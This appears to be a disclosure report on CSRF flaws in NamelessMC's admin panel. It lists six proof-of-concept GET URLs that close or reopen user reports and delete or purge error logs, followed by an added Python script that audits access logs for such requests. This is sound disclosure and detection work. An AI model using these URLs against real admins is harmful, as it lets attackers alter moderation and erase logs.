Cross-Site Request Forgery (CSRF) in namelessmc/nameless
Oct 14th 2021
More instances of CSRF
Proof of Concept
/index.php?route=/panel/users/reports/&action=close&id=1
/index.php?route=/panel/users/reports/&action=open&id=1
/index.php?route=/panel/core/emails/errors/&do=delete&id=2
/index.php?route=/panel/core/emails/errors/&do=purge
/index.php?route=/panel/core/errors/&log=fatal&do=purge
/index.php?route=/panel/minecraft/query_errors/&action=purge
This vulnerability can be used to trick an admin into closing and opening user reports against other players and into deleting important logs.
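
A log audit for the pattern shown in the proof of concept, added here as an example and not part of the original report or the NamelessMC code base: it flags GET requests to panel routes whose `action` or `do` parameter carries one of the verbs from the URLs above, and marks whether the Referer was absent or from another host. The hostname `forum.example`, the combined access-log format and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

STATE_CHANGING = {"close", "open", "delete", "purge"}  # verbs in the report's URLs
VERB_PARAMS = ("action", "do")                         # parameters carrying them
SITE_HOST = "forum.example"                            # assumed hostname of the site

# Combined log format: "METHOD target HTTP/x" status size "referer" ...
LINE_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d{3} \S+ "(?P<referer>[^"]*)"'
)

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [14/Oct/2021:10:00:01 +0000] "GET /index.php?route=/panel/users/reports/&action=close&id=1 HTTP/1.1" 302 0 "https://other.example/page.html" "Mozilla/5.0"
203.0.113.7 - - [14/Oct/2021:10:00:05 +0000] "GET /index.php?route=/panel/core/errors/&log=fatal&do=purge HTTP/1.1" 302 0 "https://forum.example/index.php?route=/panel/core/errors/" "Mozilla/5.0"
203.0.113.7 - - [14/Oct/2021:10:00:09 +0000] "GET /index.php?route=/panel/users/reports/&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Oct/2021:10:00:12 +0000] "POST /index.php?route=/panel/core/emails/errors/&do=purge HTTP/1.1" 302 0 "https://forum.example/" "Mozilla/5.0"
"""

def audit_line(line):
    """Return (route, verb, off_site_referer) for a state-changing panel GET, else None."""
    m = LINE_RE.search(line)
    if not m or m["method"] != "GET":
        return None
    query = parse_qs(urlsplit(m["target"]).query)
    route = query.get("route", [""])[0]
    verbs = [v for p in VERB_PARAMS for v in query.get(p, []) if v in STATE_CHANGING]
    if not route.startswith("/panel/") or not verbs:
        return None
    # A missing ("-") or foreign Referer is the higher-priority case to review.
    off_site_referer = urlsplit(m["referer"]).hostname != SITE_HOST
    return route, verbs[0], off_site_referer

def audit_log(text):
    """Audit every line of an access log and return the findings in order."""
    return [finding for finding in map(audit_line, text.splitlines()) if finding]

if __name__ == "__main__":
    for route, verb, off_site in audit_log(SAMPLE_LOG):
        origin = "off-site or missing" if off_site else "same-site"
        print(f"{route} '{verb}' via GET, Referer {origin}")
```

Any hit shows a state change reachable without a request body or token; a same-site Referer only lowers the review priority, it does not make the endpoint safe.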